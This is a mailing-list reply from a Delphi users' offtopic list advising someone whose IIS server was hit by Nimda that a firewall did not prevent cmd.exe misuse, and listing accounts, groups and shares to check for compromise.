> I recon ZoneAlarm is doing pretty good job to protect PCs connected to
> internet.
In this case ZoneAlarm may have blocked the TFTP file transfer
(by doing ingress filtering) but it didn't protect you against
misuse of that cmd.exe.
If you turn IIS back on and fail to correct that problem, someone
can telnet into your system on port 80 and execute shell commands.
Or they can do it via a browser if they're slightly more clever.
ZoneAlarm didn't protect you against this - you yourself observed
this behaviour. Nimda may have failed it's attempted FTP - but
you should check for other things that might have been executed
via shell commands that could have left you compromised:
users/groups created/modified (like "guest")
any admin users
any network shares or permissions on them
Sorry to sound like a broken record here. (Is anyone old enough
to even remember what that sounds like?)
-ns
---------------------------------------------------------------------------
New Zealand Delphi Users group - Offtopic List - [EMAIL PROTECTED]
Website: http://www.delphi.org.nz
To UnSub, send email to: [EMAIL PROTECTED]
with body of "unsubscribe offtopic"
Web Archive at: http://www.mail-archive.com/offtopic%40delphi.org.nz/
